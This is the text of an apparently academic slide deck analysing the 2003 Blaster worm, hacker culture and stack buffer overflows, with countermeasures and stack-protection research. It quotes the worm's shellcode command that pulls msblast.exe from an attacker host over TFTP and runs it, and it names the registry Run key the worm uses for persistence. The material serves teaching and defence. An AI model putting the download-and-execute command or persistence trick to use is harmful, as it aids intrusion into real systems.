Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K....

Analysis of the Internet Worm of August 2003

INFORMATION AND COMPUTER SCIENCE DEPARTMENT

Dr. K. Salah

September 2003

September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003

Agenda

• Reasons for Talk

• Some Jargon

• Ethics of Hackers

• Why Can’t Our Kids Hack?

• Example of Hacker Attacks

• W32 Blaster Worm

• Smashing the Stack for Fun and Profit

• More Information


Reasons of Talk

• Know Your Enemy!– Prophet of Islam says, “ مكرهم أمن قوم لغة تعلم ” من– “Know your enemy and know yourself and you can fight a hundred

battles without disaster,” Sun Tzu.

• Knowledge is power!– Understand hack tactics, strategies, and tricks.

– Be better prepared

– Design and write better code

– Take countermeasures.

• Know something about the ethics of hackers

• Testify how smart the hackers are!

• Research


Some Jargon

• Hoax vs. Worm vs. Virus

• Trojan Horse

• Crackers vs. Hackers vs. Intruder

• DOS attack


The Hacker Ethic

• Hackers have ethics, according to Socrates.

• "The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells.– Translated into 15 languages– Hackers are the warriors, explorers, guerrillas, and joyous adventurers

of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works.

– Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover.

– http://www.hackerethic.org

– http://www.ils.unc.edu/gbnewby/ethics/index.html

• Why hacking?• Enjoy the challenge and excitement

• Joy, fun, ego, and recognition

• Hate Microsoft products and practices

– The battle with google.com has started


Hacker Ethics

• Information should be free– Driving Linux/Apache and Open Source Code– Technology is only good if you get other people join you developing and using it.

Info should always be disclosed.– Not all people can afford to buy software or information– No cocern for copyright laws/abuses, intellectual property, passwords, data

security!

• Hacking is essential to show security holes and vulnerabilities – So many hackers are security gurus– A way to make living and learn about computers

• Hackers are not doing real harm– Pushing technology to its knees– “We are just curious and inquistitve people… we want to chart

new territory and look around,” Craig Neidorf– Craig Neidorf is the founder of Phrack Magazine and member of the 2600 club. His

email is [email protected]


Kids and Hacking

• Kids are very curious, thus are hackers.

• Have much more time, less responsibilities!

• They look for recognition and fun

• Usually kids fall victims and get caught first

• Originators of attacks are yet to be found

• What does it really take to be a hacker?– Some knowledge of C and Assembly programming

– Some knowledge of OS

– Some knowledge of Networking (TCP/IP)

– (Beware!!! These are our ICS and COE students!!!)


Kids and Hacking


Kids and Hacking

Connected to www.test.com

www.test.com


Kids and Hacking

• Shall we give up hope?– The 1998 registrar incident

• So, why can’t Our kids hack?– Digital Divide

– English

– Busy and distracted….


Fun, Attacks, or Damages



August 17, 1996



August 14, 2003


The Blaster Worm

• Affected Windows XP and Windows 2000

• Causes Windows NT to crash when trying to exploit NT machines

• Has so many variants: Blaster-A, Blaster-B, …Blaster-F – Blaster-F was linked to a Romanian student

• This is a worm, not a virus. Eating up network bandwidth.

• Encouraged other hackers to release other worms: Sobig, Welchia, etc.

• Microsoft called it, “A security issue has been identified…”


Technical Details

1) An infected system scans the network for any computer listening to TCP port 135 (Windows RPC/DCOM port).

– TCP port 135 used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things.

– “The Art of Port Scanning” by [email protected] Phrack Magazine, http://www.phrack.org/show.php?p=51&a=11

135 ?

135 ?

135 ?

InfectedHost

TargetHost


Technical Details

2) The infected system attempts to exploit the RPC buffer overflow on those systems listening to TCP port 135.

– Buffer Overflow Attack will be explained later

InfectedHost

TargetHost

RPC Buffer Overflow

Listen on TCP port 44441354444


Technical Details

3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an egg) and cause it to (hatch):

– starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm “msblast.exe”

– Inside the shell code, do a command: “cmd \c tftp –i appaddress worm.exe & worm.exe & exit”

– “msblast.exe” is packed with UPX compression utility, self-extracting and is 11KB once unpacked.

InfectedHost

TargetHost

69 )1( tftp attackerIP GET msblast.exe

2( ) msblast.exe gets downloaded3( ) execute worm.exe

1354444


Technical Details

4) “msblast.exe” gets executed and starts the scanning process for those computers listening on TCP port 135.

– A text string in the worm code reads, “I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!”

– The code creates a mutex called “BILLY” to avoid running multiple times.

– It also adds an entry to always run on Windows restartSOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe“

135?

135?

135?

InfectedHost

135?

135?

InfectedHost

135?


Technical Details

• A secondary payload in the worm is supposedly to cause all infected systems to launch a DOS attack against MS windowsupdate.com website on 16August 2003.– Why August 16?

– Any relation to the DOJ Hack?

• If the worm cannot find a DNS entry for windowsupdate.com, it uses 255.255.255.255, causing broadcast traffic and flooding the network.


Buffer Overflow Attack

• First Rule of Hacking: Do everything you are not supposed to?– If you can’t change the flow of execution, crash it!

• Started with Robert Morris worm in 1988 exploiting a buffer overflow vulnerability in fingerd.

• Code Red worm of 2001, exploiting a buffer overflow vulnerability in Mircosoft IIS (Internet Information Server).

• The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC.

• The next attack will be most likely linked to buffer overflow

CERT Security Alert by Years– upto the first 2 months of 2002



• Best article on the know-how details of the buffer overflow can be found in Phrack Magazine (issue 49) titled, published in 1996:http://www.phrack.org/show.php?p=49&a=14

“Smashing the Stack for Fun and Profit,”

by [email protected]



c = 3

b = 2

a = 1

ret address

sfp

buffer [5]

buffer [10]

Buf

fer

grow

s do

wnw

ard

Sta

ck g

row

s up

war

dBottom of stackTop of memory

Top of stackBottom of memory



*str

ret address

sfp

buffer [16]

Bottom of stackTop of memory

Top of stackBottom of memory

Sta

ck g

row

s up

war

d

Bu

ffer

grow

s do

wnw

ard



Partial List of Unsafe Functions in the Standard C Library:


Buffer Overflow Attack Countermeasures

• Validate all arguments or parameters received whenever you write a function.– Bounds checking

– Performance is compromised!!

• Use secure functions instead, e.g., strncpy() and strncat()• Use safe compilers

– Watch out for free compilers!!! Can be made by hackers, for hackers!

• Test your code thoroughly

• Keep applying patches

• Good site for advisory is CERT at Carnegie Mellon SWE Institute– http://www.cert.org/advisories

Can this attack be ever eliminated?Can this attack be ever eliminated?


R e s e a r c hR e s e a r c h on Protecting the Stack

• Good number of references is found in:– http://www.crhc.uiuc.edu/EASY/Papers02/EASY02-xu.pdf

• How? – Splitting control stack from data stack

• Control stack contains return addresses

• Data stack contains local variables and passed parameters

– Use middleware software (libsafe) to intercept calls to libray functions known to be vulnerable.

– Using StackGuard and StackShield• Adding more code at the beginning and end of each function

• Check to see if ret address is altered and signal a violation

– Others

– Performance due to overhead is always as issue!


The Adventure Continues

• Bypassing the fix for smashing the stack

– Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard

• http://www.immunix.org/documentation.html

– In May 2000 issue of Phrack Magazine (www.phrack.org)• “Bypassing StackGuard and StackShield” by Bulba and Kil3r <[email protected]>


Curious about More Hacking Techniques

Compulsory Reading"Hacking Exposed"


• A copy of this PPT presentation can be found at

– http://www.ccse.kfupm.edu.sa/~salah• Under the MISC section

Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K....

Documents

Transcript of Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K....